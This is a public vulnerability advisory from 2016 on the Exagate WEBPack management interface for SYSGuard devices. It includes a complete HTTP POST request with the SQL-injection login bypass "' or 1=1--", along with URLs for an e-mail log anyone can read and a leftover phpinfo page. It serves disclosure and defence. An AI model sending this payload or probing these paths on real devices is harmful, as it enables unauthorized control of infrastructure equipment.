Exagate WEBPack Management System - Multiple Vulnerabilities









Document Title:
Exagate WEBpack Management System Multiple Vulnerabilities

Halil Dalabasmaz

Release Date:
07 OCT 2016

Product & Service Introduction:
WEBPack is the individual built-in user-friendly and skilled web
interface allowing web-based access to the main units of the SYSGuard
and POWERGuard series. The advanced software enables the users to
design their customized dashboard smoothly for a detailed monitoring
and management of all the power outlet sockets & sensor and volt free
contact ports, as well as relay outputs. User definition and authorization,
remote access and update, detailed reporting and archiving are among the
many features.
Vendor Homepage:

Vulnerability Information:
Exagate company uses WEBPack Management System software on the hardware.
The software is web-based and it is provide control on the hardware. There are
multiple vulnerabilities on that software.

Vulnerability #1: SQL Injection

There is no any filtering or validation mechanisim on "login.php". "username"
and "password" inputs are vulnerable to SQL Injection attacks. Sample POST
request is given below.

POST /login.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

username=root&password=' or 1=1--

Vulnerability #2: Unauthorized Access To Sensetive Information

The software is capable of sending e-mail to system admins. But there is no
any authorization mechanism to access e-mail logs. The e-mail logs can accessable
anonymously from "http://<TARGET HOST>/emaillog.txt".

Vulnerability #3: Unremoved Configuration Files

The software contains the PHP Info file on the following URL.

http://<TARGET HOST>/api/phpinfo.php

Vulnerability Disclosure Timeline:
03 OCT 2016 - 	Attempted to contact vendor after discovery of vulnerabilities
06 OCT 2016 - 	No response from vendor and re-attempted to contact vendor
07 OCT 2016 - 	No response from vendor
07 OCT 2016 - 	Public Disclosure
Discovery Status:
Affected Product(s):
Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities)

Tested On:
Exagate SYSGuard 3001

Disclaimer & Information:
The information provided in this advisory is provided as it is without 
any warranty. BGA disclaims all  warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
Domain:     www.bgasecurity.com
Social:     twitter.com/bgasecurity
Contact:    advisory@bga.com.tr

Copyright © 2016 | BGA Security LLC